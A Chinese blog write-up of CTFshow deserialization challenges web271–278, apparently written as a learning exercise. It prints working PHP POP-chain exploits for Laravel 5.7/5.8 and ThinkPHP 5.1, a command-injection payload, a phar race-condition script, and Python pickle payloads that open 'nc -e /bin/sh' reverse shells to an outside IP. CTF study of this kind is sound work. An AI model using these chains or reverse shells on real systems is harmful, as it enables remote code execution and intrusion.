CTFshow反序列化-web271-278

最新推荐文章于 2024-08-31 21:20:30 发布
最新推荐文章于 2024-08-31 21:20:30 发布
阅读量759 收藏 10
点赞数 15
分类专栏: CTF # WEB 文章标签: CTF linux php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52579508/article/details/141758875
版权
WEB 同时被 2 个专栏收录
19 篇文章 0 订阅
订阅专栏
CTF
5 篇文章 0 订阅
订阅专栏

web271 Laravel框架5.7RCE

<?php

/**
 * Laravel - A PHP Framework For Web Artisans
 *
 * @package  Laravel
 * @author   Taylor Otwell <taylor@laravel.com>
 */

define('LARAVEL_START', microtime(true));

/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader for
| our application. We just need to utilize it! We'll simply require it
| into the script here so that we don't have to worry about manual
| loading any of our classes later on. It feels great to relax.
|
*/

require __DIR__ . '/../vendor/autoload.php';

/*
|--------------------------------------------------------------------------
| Turn On The Lights
|--------------------------------------------------------------------------
|
| We need to illuminate PHP development, so let us turn on the lights.
| This bootstraps the framework and gets it ready for use, then it
| will load up this application so that we can run it and send
| the responses back to the browser and delight our users.
|
*/

$app = require_once __DIR__ . '/../bootstrap/app.php';

/*
|--------------------------------------------------------------------------
| Run The Application
|--------------------------------------------------------------------------
|
| Once we have the application, we can handle the incoming request
| through the kernel, and send the associated response back to
| the client's browser allowing them to enjoy the creative
| and wonderful application we have prepared for them.
|
*/

$kernel = $app->make(Illuminate\Contracts\Http\Kernel::class);
$response = $kernel->handle(
    $request = Illuminate\Http\Request::capture()
);
@unserialize($_POST['data']);
highlight_file(__FILE__);

$kernel->terminate($request, $response);

image.png
Laravel框架
反序列化提交的入口

@unserialize($_POST['data']);

找到一个链子
CVE-2019-9081 Laravel5.7 反序列化 RCE复现
image.png

<?php
 
namespace Illuminate\Foundation\Testing{
    class PendingCommand{
        protected $command;
        protected $parameters;
        protected $app;
        public $test;
 
        public function __construct($command, $parameters,$class,$app){
            $this->command = $command;
            $this->parameters = $parameters;
            $this->test=$class;
            $this->app=$app;
        }
    }
}
 
namespace Illuminate\Auth{
    class GenericUser{
        protected $attributes;
        public function __construct(array $attributes){
            $this->attributes = $attributes;
        }
    }
}
 
namespace Illuminate\Foundation{
    class Application{
        protected $hasBeenBootstrapped = false;
        protected $bindings;
 
        public function __construct($bind){
            $this->bindings=$bind;
        }
    }
}
 
namespace{
    $genericuser = new Illuminate\Auth\GenericUser(array("expectedOutput"=>array("0"=>"1"),"expectedQuestions"=>array("0"=>"1")));
    $application = new Illuminate\Foundation\Application(array("Illuminate\Contracts\Console\Kernel"=>array("concrete"=>"Illuminate\Foundation\Application")));
    $pendingcommand = new Illuminate\Foundation\Testing\PendingCommand('system',array('id'),$genericuser,$application);
    echo urlencode(serialize($pendingcommand));
}
?>

O%3A44%3A%22Illuminate%5CFoundation%5CTesting%5CPendingCommand%22%3A4%3A%7Bs%3A10%3A%22%00%2A%00command%22%3Bs%3A6%3A%22system%22%3Bs%3A13%3A%22%00%2A%00parameters%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A2%3A%22id%22%3B%7Ds%3A6%3A%22%00%2A%00app%22%3BO%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3A2%3A%7Bs%3A22%3A%22%00%2A%00hasBeenBootstrapped%22%3Bb%3A0%3Bs%3A11%3A%22%00%2A%00bindings%22%3Ba%3A1%3A%7Bs%3A35%3A%22Illuminate%5CContracts%5CConsole%5CKernel%22%3Ba%3A1%3A%7Bs%3A8%3A%22concrete%22%3Bs%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3B%7D%7D%7Ds%3A4%3A%22test%22%3BO%3A27%3A%22Illuminate%5CAuth%5CGenericUser%22%3A1%3A%7Bs%3A13%3A%22%00%2A%00attributes%22%3Ba%3A2%3A%7Bs%3A14%3A%22expectedOutput%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7Ds%3A17%3A%22expectedQuestions%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7D%7D%7D%7D

image.png
成功执行
查看flag
image.png

web271 Laravel框架5.8RCE + 外带cookie rce

image.png
都是差不多的先尝试使用上一个脚本大一下
image.png
已经没有反应了
新的链子

<?php
namespace Illuminate\Broadcasting{

    use Illuminate\Bus\Dispatcher;
    use Illuminate\Foundation\Console\QueuedCommand;

    class PendingBroadcast
    {
        protected $events;
        protected $event;
        public function __construct(){
            $this->events=new Dispatcher();
            $this->event=new QueuedCommand();

        }
    }
}
namespace Illuminate\Foundation\Console{
    use Mockery\Generator\MockDefinition;
    class QueuedCommand
    {
        public $connection;
        public function __construct()
        {
            $this->connection=new MockDefinition();
        }
    }
}

namespace Mockery\Generator{

    class MockDefinition{
        protected $config;
        protected $code;
        public function __construct()
        {
            $this->code="<?php echo system('whoami'); exit(); ?>";
            $this->config=new MockConfiguration();
        }
    }
    class MockConfiguration{
        
    }
}

namespace Illuminate\Bus{
    use Mockery\Loader\EvalLoader;
    class Dispatcher
    {
        protected $queueResolver;
        public function __construct()
        {
            $this->queueResolver=[new EvalLoader(),'load'];
            //$this->queueResolver=array(new EvalLoader(),'load'); 
            //数组
        }

    }
}

namespace Mockery\Loader{
    class EvalLoader{

    }
}

namespace{

    use Illuminate\Broadcasting\PendingBroadcast;

    echo urlencode(serialize(new PendingBroadcast()));
}

参考:
laravel5.8反序列化漏洞(详细)_lumen (5.8.4) (laravel components 5.8.*) 漏洞利用-CSDN博客
image.png
查看flag
image.png
第二个链子

<?php
namespace Illuminate\Broadcasting{
 
    use Illuminate\Bus\Dispatcher;
    use Illuminate\Foundation\Console\QueuedCommand;
 
    class PendingBroadcast
    {
        protected $events;
        protected $event;
        public function __construct(){
            $this->events=new Dispatcher();
            $this->event=new QueuedCommand();
        }
    }
}
namespace Illuminate\Foundation\Console{
    class QueuedCommand
    {
        public $connection="tac /f*";
    }
}
namespace Illuminate\Bus{
    class Dispatcher
    {
        protected $queueResolver="system";
 
    }
}
namespace{
 
    use Illuminate\Broadcasting\PendingBroadcast;
 
    echo urlencode(serialize(new PendingBroadcast()));
}

image.png
发送会报异常 F12依旧存在flag
image.png

外带cookie rce

利用第一条的链子
image.png

namespace Mockery\Generator{

    class MockDefinition{
        protected $config;
        protected $code;
        public function __construct()
        {
            // $this->code="<?php echo system('tac /f*'); exit(); 
            $this->code="<?php setcookie('pwd',shell_exec('pwd')); ?>";
            $this->config=new MockConfiguration();
        }
    }
    class MockConfiguration{
        
    }

把pwd命令外带给pwd这个参数
生成payload

O%3A40%3A%22Illuminate%5CBroadcasting%5CPendingBroadcast%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00events%22%3BO%3A25%3A%22Illuminate%5CBus%5CDispatcher%22%3A1%3A%7Bs%3A16%3A%22%00%2A%00queueResolver%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A25%3A%22Mockery%5CLoader%5CEvalLoader%22%3A0%3A%7B%7Di%3A1%3Bs%3A4%3A%22load%22%3B%7D%7Ds%3A8%3A%22%00%2A%00event%22%3BO%3A43%3A%22Illuminate%5CFoundation%5CConsole%5CQueuedCommand%22%3A1%3A%7Bs%3A10%3A%22connection%22%3BO%3A32%3A%22Mockery%5CGenerator%5CMockDefinition%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00config%22%3BO%3A35%3A%22Mockery%5CGenerator%5CMockConfiguration%22%3A0%3A%7B%7Ds%3A7%3A%22%00%2A%00code%22%3Bs%3A44%3A%22%3C%3Fphp+setcookie%28%27pwd%27%2Cshell_exec%28%27pwd%27%29%29%3B+%3F%3E%22%3B%7D%7D%7D

发送
image.png
把命令给设置为查看flag
image.png
这样就成功拿到了
image.png

web273 Laravel框架5.8RCE

image.png
同上5.8 的链子 依旧可以使用
image.png

web274 ThinkPHP V5.1

image.png
image.png
F12 发现反序列的点

nserialize(base64_decode(\$_GET['data']))-->

网上公开的链子:
奇安信攻防社区-ThinkPHP5.1反序列化漏洞实现rce

<?php
namespace think;
abstract class Model{
    protected $append = [];
    private $data = [];
    function __construct(){
        $this->append = ["l1_Tuer"=>["123"]];
        $this->data = ["l1_Tuer"=>new Request()];  //l1_Tuer 这是执行命令的参数 l1_Tuer=whoami
    }
}
class Request
{
    protected $hook = [];
    protected $filter = "system";
    protected $config = [
        'var_ajax'         => '_ajax',  
    ];
    function __construct(){
        $this->filter = "system";
        $this->config = ["var_ajax"=>''];
        $this->hook = ["visible"=>[$this,"isAjax"]];
    }
}

namespace think\process\pipes;

use think\model\concern\Conversion;
use think\model\Pivot;
class Windows
{
    private $files = [];

    public function __construct()
    {
        $this->files=[new Pivot()];
    }
}
namespace think\model;

use think\Model;

class Pivot extends Model
{
}

use think\process\pipes\Windows;
echo base64_encode(serialize(new Windows()));
?>

TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mjp7czo5OiIAKgBhcHBlbmQiO2E6MTp7czo3OiJsMV9UdWVyIjthOjE6e2k6MDtzOjM6IjEyMyI7fX1zOjE3OiIAdGhpbmtcTW9kZWwAZGF0YSI7YToxOntzOjc6ImwxX1R1ZXIiO086MTM6InRoaW5rXFJlcXVlc3QiOjM6e3M6NzoiACoAaG9vayI7YToxOntzOjc6InZpc2libGUiO2E6Mjp7aTowO3I6ODtpOjE7czo2OiJpc0FqYXgiO319czo5OiIAKgBmaWx0ZXIiO3M6Njoic3lzdGVtIjtzOjk6IgAqAGNvbmZpZyI7YToxOntzOjg6InZhcl9hamF4IjtzOjA6IiI7fX19fX19

image.png
catflag
image.png

web275

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-08 19:13:36
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-08 20:08:07
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


highlight_file(__FILE__);

class filter{
    public $filename;
    public $filecontent;
    public $evilfile=false;

    public function __construct($f,$fn){
        $this->filename=$f;
        $this->filecontent=$fn;
    }
    public function checkevil(){
        if(preg_match('/php|\.\./i', $this->filename)){
            $this->evilfile=true;
        }
        if(preg_match('/flag/i', $this->filecontent)){
            $this->evilfile=true;
        }
        return $this->evilfile;
    }
    public function __destruct(){
        if($this->evilfile){
            system('rm '.$this->filename);
        }
    }
}

if(isset($_GET['fn'])){
    $content = file_get_contents('php://input');
    $f = new filter($_GET['fn'],$content);
    if($f->checkevil()===false){
        file_put_contents($_GET['fn'], $content);
        copy($_GET['fn'],md5(mt_rand()).'.txt');
        unlink($_SERVER['DOCUMENT_ROOT'].'/'.$_GET['fn']);
        echo 'work done';
    }
    
}else{
    echo 'where is flag?';
}

where is flag?

看一下逻辑 我们怎么才能获取flag

  public function __destruct(){
        if($this->evilfile){
            system('rm '.$this->filename);
        }

这条命令可以rce
只要evilfile=true 就行,他是要匹配到 php就可以 ,但是下面又存在一个rm 删除只需要简单绕过就好
使用 ; | 都可以绕
payload

php|tac f*

image.png

web276 phar 反序列化

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-08 19:13:36
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-08 20:08:07
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


highlight_file(__FILE__);

class filter{
    public $filename;
    public $filecontent;
    public $evilfile=false;
    public $admin = false;

    public function __construct($f,$fn){
        $this->filename=$f;
        $this->filecontent=$fn;
    }
    public function checkevil(){
        if(preg_match('/php|\.\./i', $this->filename)){
            $this->evilfile=true;
        }
        if(preg_match('/flag/i', $this->filecontent)){
            $this->evilfile=true;
        }
        return $this->evilfile;
    }
    public function __destruct(){
        if($this->evilfile && $this->admin){
            system('rm '.$this->filename);
        }
    }
}

if(isset($_GET['fn'])){
    $content = file_get_contents('php://input');
    $f = new filter($_GET['fn'],$content);
    if($f->checkevil()===false){
        file_put_contents($_GET['fn'], $content);
        copy($_GET['fn'],md5(mt_rand()).'.txt');
        unlink($_SERVER['DOCUMENT_ROOT'].'/'.$_GET['fn']);
        echo 'work done';
    }
    
}else{
    echo 'where is flag?';
}

where is flag?

其实和上一题区别不是很大 ,但区别也有点大
看一下怎么才能获取flag

  public function __destruct(){
        if($this->evilfile && $this->admin){
            system('rm '.$this->filename);
        }
    }

这里是可以执行system函数的 ,但是呢 我们的admin代码里面是等于false的 ,要让他等于true 才执行代码
这里就需要用到

file_put_contents($_GET['fn'], $content);

写phar 文件进行反序列化了
先生成一个phar文件

<?php
//根据代码来构造
class filter{
    public $filename;
    public $filecontent;
    public $evilfile=true;
    public $admin = true;

    public function __construct($f,$fn){
        $this->filename=$f;
        $this->filecontent=$fn;
    }
    public function __destruct(){
        if($this->evilfile && $this->admin){
            system('rm '.$this->filename);
        }
    }
}

/**上面的这里写pop链*/

/**下面的东西一般是不变的*/
// $a = new User();
$a = new filter('a;tac f*','1');

$phar = new Phar("x.phar");//后缀名必须为phar
$phar->startBuffering();
$phar->addFromString("test.txt", "test");  //添加要压缩的文件
$phar->setStub("<?php__HALT_COMPILER(); ?>");  //设置stub
$phar->setMetadata($a);   //set-metadata参数会变
$phar->stopBuffering();

?>


import requests
import threading
import time

success = False
# 获取文件数据
def getPhar(phar):
    with open(phar,'rb') as f:
        data = f.read()
        return data

# 写phar文件
def writePhar(url, data):
    requests.post(url, data)

# unlink文件
def unlinkPhar(url, data):
    global  success
    r = requests.post(url, data).text
    if 'ctfshow{' in r and success is False:
        print(r)
        success =True

def main():
    global success
    url = 'http://6cab8489-b38f-4f70-ac14-b6e1d62a6bc5.challenge.ctf.show/'
    phar = getPhar('x.phar')
    while success is False:
        time.sleep(1)
        w = threading.Thread(target=writePhar, args=(url+'?fn=x.phar', phar))
        s = threading.Thread(target=unlinkPhar, args=(url+'?fn=phar://x.phar/1.txt', ''))
        w.start()
        s.start()

if __name__ == '__main__':
    main()

image.png
成功获取了flag

web277 python反序列化 基础

image.png
F12image.png

/backdoor?data= m=base64.b64decode(data) m=pickle.loads(m)

最简单python反序列化

使用脚本
import base64
import pickle


class A(object):
    def __reduce__(self):
        return (eval, ("__import__('os').system('nc 47.236.41.52 9999 -e/bin/sh')",))
a = A()
print( base64.b64encode( pickle.dumps(a) ) )

image.png
image.png

web288 py反序列化 过滤os.system 使用 os.popen代替

image.png

import pickle
import base64
class A(object):
   def __reduce__(self):
      return(eval,('__import__("os").popen("nc xxx.xxx.xxx.xxx 4000 -e /bin/sh").read()',))
a=A()
test=pickle.dumps(a)
print(base64.b64encode(test))

参考:
pickle反序列化初探 - 先知社区
Python反序列化漏洞及魔术方法详细全解(链构造、自动审计工具bandit)_反序列化怎么处理魔术函数-CSDN博客
浅析Phar反序列化 - FreeBuf网络安全行业门户

小龙_(R0 Team)
关注
  • 15
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow-web入门-反序列化(前篇)
ccfly1012的博客
10-24 6038
目录 web254 web255 web256 web257 web258 web259 web260 web261 web262 web263 web264 web265 web266 web267 web254 <?php ​ /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified t..
CTFshow 反序列化 web262
Kradress的博客
12-20 2617
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-03 02:37:19 # @Last Modified by: h1xa # @Last Modified time: 2020-12-03 16:05:38 # @message.php # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporti
ctfshow-反序列化(web271-web276)
m0_72125469的博客
01-21 1703
ctfshow web271 web272 web273 web274 web275
CTFshow反序列化-web254-270
最新发布
qq_52579508的博客
08-31 854
看着代码挺多 一步步看首先定位怎么拿flag主要是是这段如果username和u相等,password和p 相等执行下一句 赋值 ,然后 返回 isvip等于true我们直接让isvip 等于true ,然后输入username的时候等于 源代码里面的值其实就是个判断都还没开始上序列化。
CTFshow-WEB入门-反序列化
feng的博客
02-14 5550
前言 简单的反序列化直接给出payload,有意思的,较为复杂的和我不太会的会分析一波。 web254 ?username=xxxxxx&password=xxxxxx web255 <?php class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=true; } echo urlencode(serialize(new ctfShowUser())
ctfshow-web入门-反序列化
K_kiii的博客
03-23 476
_sleep() ://在对象被序列化之前运行__wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过)如果类中同时定义了 __unserialize() 和__wakeup() 两个魔术方法, 则只有__unserialize() 方法会生效,__wakeup() 方法会被忽略。此特性自 PHP 7.4.0 起可用。__construct() :当对象被创建时,会触发进行初始化__destruct() :对象被销毁时触发。
CTFshow 反序列化 web263
Kradress的博客
12-20 1267
目录源码思路题解总结 源码 也没有什么别的信息,扫一下目录,下载www.zip拿到源码 思路 知识点: php在session存储和读取时,都会有一个序列化和反序列化的过程,PHP内置了多种处理器用于存取$_SESSION数据,都会对数据序列化和反序列化,源码中有session_start的时候会读取session,从而进行反序列化. php . ini 中默认 session.serialize_handler 为 php_serialize,而 index.php 中将其设置为 php ,这个差
[ctfshow]web入门——反序列化web261+web264-web267)
ShenZ的博客
03-02 6203
[ctfshow]web入门——反序列化 反序列化 unserialization [ctfshow]web入门——反序列化 web261 web264 str_replace字符串覆盖逃逸 web265 web266 web267 yii系列 反序列化 unserialization[ctfshow]web入门——反序列化
CTFshow 反序列化 web267
Kradress的博客
02-11 1174
目录思路题解总结 思路 进去是一个网页,在login页面试了下密码,发现是admin:admin,成功登录,但发现没什么改变 一个个页面查看源代码,最后再about页面中发现提示 访问?r=site%2Fabout&view-source拿到提示 ///backdoor/shell unserialize(base64_decode($_GET['code'])) 刚开始不知道怎么去用,后面想到%2F就是/,尝试了下r=/backdoor/shell,提示要加上参数,然后思路又断了,应该是信
Linux中的常见命令——用户管理命令
qq_45569925的博客
08-27 1658
默认创建用户的时候会在home文件夹下创建一个与用户同名的文件夹【该用户的主目录】,也可以在创建用户的时候设置该用户主目录的名称。【输入的密码是不在控制台显示的,输入完之后直接按回车键即可】使用wgh用户查看root下的文件。【此时的用户是没有密码的】给创建的用户设置密码。查看某个用户是否存在。
Linux】进程|进程的查看与管理|创建进程
2202_75331338的博客
08-27 1567
❍ 课本概念:程序的一个执行实例,正在执行的程序等❍ 内核观点:担当分配系统资源(CPU时间,内存的实体)简单来说:进程 == PCB(进程控制块) + 进程对应的代码和数据;一个进程对应一个PCB操作系统对进程的管理,最终变成了对链表的增删查改。注意:可执行程序加载到内存不是进程,只是进程对应的代码和数据。
linux 系统性能调优技巧
m0_50641264的博客
08-27 1361
【代码】linux 系统性能调优技巧。
linux 系统如何进行nfs(第五节)
weixin_44767571的博客
08-30 223
首先是 在虚拟机中的操作。然后是在开发板上的操作。
Linux下UDP编程
热土程序园,利他愉己~
08-28 1461
Linux下UDP编程 socket(套接字)本质上是一个抽象的概念,它是一组用于网络通信的 API,提供了一种统一的接口,使得应用程序可以通过网络进行通信。在不同的操作系统中,socket 的实现方式可能不同,但它们都遵循相同的规范和协议,可以实现跨平台的网络通信。
Linux报错:make[2]: *** No rule to make target ‘/usr/local/lib/libopus.a‘
VIFIN的博客
08-27 888
解决报错:make[2]: *** No rule to make target '/usr/local/lib/libopus.a'
Linux——进程管理
m0_67677309的博客
08-29 1641
1、通过fork创建的子进程会拷贝父进程(数据段、bss段、堆、栈、I/O缓冲区),与父进程共享代码段、子进程会继承父进程的信号处理方式。ITIMER_VIRTUAL 虚拟计时器 用户态的计时SIGVTALRM(26)**使用的时候要对应。ITIMER_REAL 真实计时器 程序总的计时时间SIGALRM(14)void (*sa_restorer)(void);// 第一次产生时钟信号的时间 **3秒钟一次,每个两秒。
Linux的常见指令
2302_79964175的博客
08-31 1346
Hello,今天我们继续学习Liunx,上期我们简单了解了Linux的基本用处,并了解了Linux的重要性,今天我们就继续更加深入的学习Linux,进行指令方面的学习,我们可以通过先学习简单的基础命令来学习Linux,并在从充分了解了基础就只是的前提下,进行Linux实战。好,我们还是按例三连上车,开始我们今天的正题!!语法: ls[选项][目录或文件]功能:对于目录,该命令列出在该目录下的所有子目录和文件。对于文件,将列出文件名你给的以及其他信息的常用的选项:举例:这个命令十分的简单,它的作用其实就是显示
Linux下,执行shell遇let:not found
janet110617的博客
08-27 569
Linux下执行shell脚本,提示let:not found错误,文章介绍了错误原因及其解决方法
ctfshow反序列化
09-09
引用中的代码展示了一个类`ctfshow`,其中包含了一个`__destruct`方法,该方法在对象被销毁时会输出一个变量`$flag`的值。该类的序列化结果被输出并展示了如何利用`__destruct`方法来获取`$flag`的值。 引用中的代码展示了另一个类`ctfshowvip`,其中`password`属性被设置为包含恶意代码的字符串,利用`__destruct`方法中的弱比较漏洞,可以构造一个恶意的序列化payload来执行任意代码。 引用中的代码展示了一个修改后的类`ctfShowUser`,其中通过构造函数将`isVip`属性设置为`true`。通过构造一个链式调用,可以构造一个序列化的payload来实现`$this->isVip`值为`true`的反序列化攻击。 综上所述,ctfshow的反序列化攻击可以通过构造恶意的序列化payload来利用`__destruct`方法或弱比较漏洞来执行任意代码或获取敏感信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值